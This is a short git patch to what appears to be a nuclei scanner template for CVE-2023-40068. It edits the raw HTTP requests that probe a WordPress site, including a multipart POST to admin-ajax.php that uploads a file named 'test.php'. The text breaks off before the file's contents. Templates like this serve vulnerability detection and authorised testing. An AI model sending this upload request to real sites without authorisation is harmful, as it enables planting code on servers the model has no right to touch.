From 5931319b1d10ece62779978c467d5cab1e768f3c Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Wed, 30 Aug 2023 21:47:39 +0200 Subject: [PATCH] Update CVE-2023-40068.yaml --- http/cves/2023/CVE-2023-40068.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml index 92e7e5393f..bef0d7bda2 100644 --- a/http/cves/2023/CVE-2023-40068.yaml +++ b/http/cves/2023/CVE-2023-40068.yaml @@ -25,14 +25,17 @@ info: http: - raw: - | - GET /?p=1 HTTP/1.1 + GET {{Path}} HTTP/1.1 Host: {{Hostname}} Accept: */* - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} + X-Requested-With: XMLHttpRequest Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe + Origin: {{BaseURL}} + Referer: {{BaseURL}} ------WebKitFormBoundaryBLOYSueQAdgN2PRe Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php"